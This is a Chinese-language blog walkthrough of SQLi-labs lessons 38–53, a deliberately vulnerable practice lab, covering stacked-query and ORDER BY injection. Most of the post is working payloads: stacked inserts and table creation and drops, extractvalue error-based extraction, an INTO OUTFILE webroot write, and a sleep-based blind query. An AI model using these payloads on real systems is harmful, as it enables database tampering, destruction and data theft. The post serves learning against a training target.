sqlilabs——Pages3

最新推荐文章于 2024-07-10 17:22:06 发布
最新推荐文章于 2024-07-10 17:22:06 发布
阅读量565 收藏
点赞数
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/grb819/article/details/121900127
版权

TOC

堆叠注入

  • stacked injection
  • 结束;
  • 多条sql语句一起执行
  • Select * from products where productid=1;DELETE FROM products
  • 局限性:环境、API、数据库引擎

在这里插入图片描述

38 堆叠注入 '

sql语句在这里插入图片描述

?id=2';insert into users(id,username,password) values ('38','less38','hello')--+	// Your Username is : Angelina  Your Password is : I-kill-you

在这里插入图片描述

39 堆叠注入 无闭合

在这里插入图片描述

?id=2;insert into users(id,username,password) values ('39','less39','hello')--+	// Your Username is : Angelina  Your Password is : I-kill-you

在这里插入图片描述

40 堆叠注入 ')

?id=2');insert into users(id,username,password) values ('40','less40','hello')--+	// Your Username is : Angelina  Your Password is : I-kill-you

41 堆叠注入 盲注

?id=2;insert into users(id,username,password) values ('41','less41','hello')--+	// Your Username is : Angelina  Your Password is : I-kill-you

42 堆叠注入 报错型 POST

在这里插入图片描述

admin
admin';create table less42 like users--+
admin';drop table less42 like users--+

在这里插入图片描述
有被冒犯到
在这里插入图片描述

43 堆叠注入 报错型 POST ')

在这里插入图片描述

44 堆叠注入 报错型 POST 盲注 ')

在这里插入图片描述

a';insert into users(id,username,password) values ('44','less44','hello')#

在这里插入图片描述

45 堆叠注入 报错型 POST 盲注 ')

在这里插入图片描述

Order by

46 order by 报错型

在这里插入图片描述

?sort=1   // 显示排序表格
?sort=1'  // 报错    肯定有报错注入  
?sort=1 desc
?sort=1 asc   

// 采取报错注入
?sort=(extractvalue(1,concat(0x7e,(select user()),0x73)))#    // XPATH syntax error: '~root@localhosts'
?sort=(extractvalue(1,concat(0x7e,(select version()),0x73)))#  //XPATH syntax error: '~5.7.26s'

47 order by 报错型 '

?sort=1' and (extractvalue(1,concat(0x7e,(select user()),0x73)))#    // XPATH syntax error: '~root@localhosts'

?sort=1' into outfile "D:\\phpstudy\\phpstudypro\\WWW\\sqlilabs\\Less-47\\test.txt"--+    //The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

48 order by 不能报错回显

导入文件or延时注入

?sort=1 into outfile "D:\\phpstudy\\phpstudypro\\WWW\\sqlilabs\\Less-47\\test.txt"--+

49 order by 不能报错回显 '

$sql = "SELECT * FROM users ORDER BY '$id'";

导入文件or延时注入

?sort=1 and (if(ascii(substr((select username from users where id=1),1,1))=69,0,sleep(5)))--+

50 堆叠+order by 报错型

?sort=1;create table less50 like users

51 堆叠+order by 报错型 ’

在这里插入图片描述

?sort=1';create table less50 like users

52 堆叠+order by 报错型 盲注

53 堆叠+order by 报错型 盲注’

一摸一样不再赘述

(∪.∪ )...zzz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Laptop stand 3 pages
08-11
【标签】"笔记本电脑支架"明确了我们要关注的核心产品——一种用于支撑笔记本电脑的设备。这种支架通常能够调整笔记本电脑的高度和倾斜角度,以改善用户的坐姿,减轻颈部和肩部的压力,同时提供更好的通风,防止过热...
SQLi-LABS-Page-3-less-38-53注入教程
残阳泼茶香的博客
03-17 553
Lesson - 38GET - Stacked Query Injection - String堆叠的查询 输入http://sql/Less-38/?id=1 ’ 报错显示说“1” 后面多了一个单引号, 那么就上手吧。 `http://sql/Less-38/?id=1%27%20order%20by%203%23,按着步骤来,http://sql/Less-38/?id=-1%20%2...
JSP网络编程——多媒体(1——3)
01-18
"JSP网络编程——多媒体(1——3)"这一主题,显然关注的是如何利用JSP技术处理和展示多媒体内容,如图像、音频、视频等。下面我们将深入探讨这个主题,了解相关知识点。 1. **JSP基本概念**: JSP是由Sun ...
XXX系统——程序源代码模板.pdf
07-14
- `manager.jsp` 是一个JSP(JavaServer Pages)文件,通常用于处理动态网页内容,这里被设计为经理用户的界面。 - `<%@ page ... %>` 指令设置了页面的属性,例如语言、导入的包和编码方式。 - `...
求精要诀——JavaEE编程开发案例精讲 源代码(8-12)
04-02
【标题】"求精要诀——JavaEE编程开发案例精讲 源代码(8-12)"涉及的是JavaEE平台上的高级编程实践,主要涵盖第8至12章的关键知识点。JavaEE,全称Java Platform, Enterprise Edition,是Java语言在企业级应用开发...
网络程序设计——ASP(第3版)题解.zip
04-21
《网络程序设计——ASP(第3版)题解》是一个针对ASP(Active Server Pages)编程技术的解答集,旨在帮助学习者深入理解和掌握ASP在网络程序设计中的应用。ASP是微软公司开发的一种服务器端脚本环境,它允许开发人员...
SQL面试题练习 —— 各用户最长的连续登录天数-可间断
hu_wei123的博客
07-06 322
现要求统计各用户最长的连续登录天数,间断一天也算作连续,例如:一个用户在1,3,5,6登录,则视为连续6天登录。首先根据user_id和group_id分组,用datediff计算出出最大登陆日期和最小登陆日期,两者做差+1 得到每次连续登陆的天数。根据用户分组,使用lag函数获得当前行的上一行数据中的日期,使用datediff函数判断日期当期日期与上一行日期的时间差。根据date_diff结果判断是否连续,如果date_diff <= 2则认为连续 我们给赋值为0,否则不连续,赋值为1。
【postgresql】视图(View)
最新发布
一个写了10年bug的程序员日常笔记。
07-10 500
PostgreSQL 中的视图(View)是一种虚拟表,其内容由 SQL 查询定义。视图可以简化复杂的 SQL 操作,使得用户能够以一种更直观、更易于理解的方式来访问和操作数据。PostgreSQL 视图是只读的,因此可能无法在视图上执行 DELETE、INSERT 或 UPDATE 语句。但是可以在视图上创建一个触发器,当尝试 DELETE、INSERT 或 UPDATE 视图时触发,需要做的动作在触发器内容中定义。
My sql 安装,环境搭建
2201_75643669的博客
07-03 782
以下以MySQL 8.0.36为例。
SQL面试题-留存率计算
xiao4816的博客
07-07 290
计算的是整段时间范围内,每一天为基准的所有的留存1、2、7天的用户数。计算的是用户首次登陆时间为基准时间,计算该基准时间之后的n日留存率。方法一的优势是可以一次性计算出,每天的不同时间范围的留存率。缺点:如果要计算n天留存需要增加代码量。但是不是很直观,并且计算量比较大。优点:代码直观好理解。
PostgreSQL 如何处理海量小文件数据的存储和查询?
技术笔记
07-08 957
处理 PostgreSQL 中的海量小文件数据存储和查询是一个复杂的任务,需要考虑存储方式、查询优化、并发控制和性能调优等多个方面。根据实际的业务需求和数据特点,选择合适的解决方案,并不断进行测试和优化,以确保系统的性能和可靠性。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!📚领书:PostgreSQL 入门到精通.pdf📙PostgreSQL 中文手册📘PostgreSQL 技术专栏。
创建数据库表的语法定义包含了SQL Server、Mysql、PostgreSQLSQLite的示例
weixin_49816293的博客
07-03 1043
在数据库设计中,创建表是基础且关键的一步。本文将详细介绍如何在不同数据库系统中使用数据定义语言(DDL)来定义表结构。
SQL-DQL
qq_59076775的博客
07-03 570
X表示前面有多少位无所谓,最后一位为X。五.DQL-聚合函数将一列数据作为一个整体,进行纵向计算。
SQL-DCL(三)
qq_59076775的博客
07-06 422
DCL英文全称是Data Control Language(数据库控制语言),用来管理数据库 用户,控制数据库的访问权限。
怎样优化 PostgreSQL 中对日期时间范围的模糊查询?
技术笔记
07-09 687
在 PostgreSQL 中,当处理对日期时间范围的模糊查询时,可能会面临性能挑战。优化此类查询非常重要,以确保数据库能够快速有效地响应请求。在本文中,我们将详细探讨如何优化 PostgreSQL 中对日期时间范围的模糊查询,并提供相关的解决方案和示例。
PostgreSQL 中如何实现数据的增量更新和全量更新的平衡?
技术笔记
07-09 910
在数据库管理中,数据的更新操作是常见的任务。对于大型数据集或高并发的系统,选择合适的更新策略至关重要。增量更新和全量更新是两种常见的数据更新方式,如何在 PostgreSQL 中平衡这两种更新方式以确保数据的一致性、性能和可靠性是一个值得深入探讨的问题。
在 PostgreSQL 里如何处理数据的版本跟踪和回滚?
技术笔记
07-08 1021
在数据库管理中,数据的版本跟踪和回滚是非常重要的功能,有助于在数据操作出现错误或需要回滚到特定状态时进行有效的处理。PostgreSQL 提供了几种方法来实现数据的版本跟踪和回滚,包括事务、保存点、版本控制扩展等。
学习大数据DAY11 SQL最终阶段测试
shh2000424的博客
07-08 1055
(文章标题),last_time(修改时间),username(修改人姓名),source(文章来源),pin_name(作者笔名),要求写一个sql语句查询出。用户执行包含my_seq.NEXTVAL的SQL语句三次,然后执行包含my_seq.CURRVAL的SQL语句四次,请问序列my_seq的当前值是((A) 被删除的记录又被恢复回来,仍然存放在数据库的表中 (B) 被删除的记录彻底从数据库中被删除掉了。(A) 每个视图对应一个表 (B) 视图是表的一个备份。
Mosh|初学者 SQL 教程
WinterSeven的博客
07-09 336
通过AS重命名,如果名字中间有空格则需要使用单引号或者双引号,如果没有则可以不用(直接AS discount_factor), AS可以去掉。比较运算符:> , >= , < , <= ,!排序ORDER BY(-- 为注释),此时得到的结果就是按照first_name排序的表。课后练习:1990-01-01至2000-01-01之间出生的顾客(日期需要加单引号)ORDER BY 进行排序(默认为升序,DESC为降序),也可以同时对多列进行排序。IN查询OR连接的多个条件 (IN、NOT IN)
Oracle Solaris 9 man pages section 3: Basic Library Functions-6
07-04
"Oracle Solaris 9 的 man pages 部分 3:基础库函数-650" Oracle Solaris 9 的 man pages 是一套详细的文档集合,它提供了操作系统中各种命令、程序、系统调用和库函数的参考信息。这部分特别关注的是第 3 节,即...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值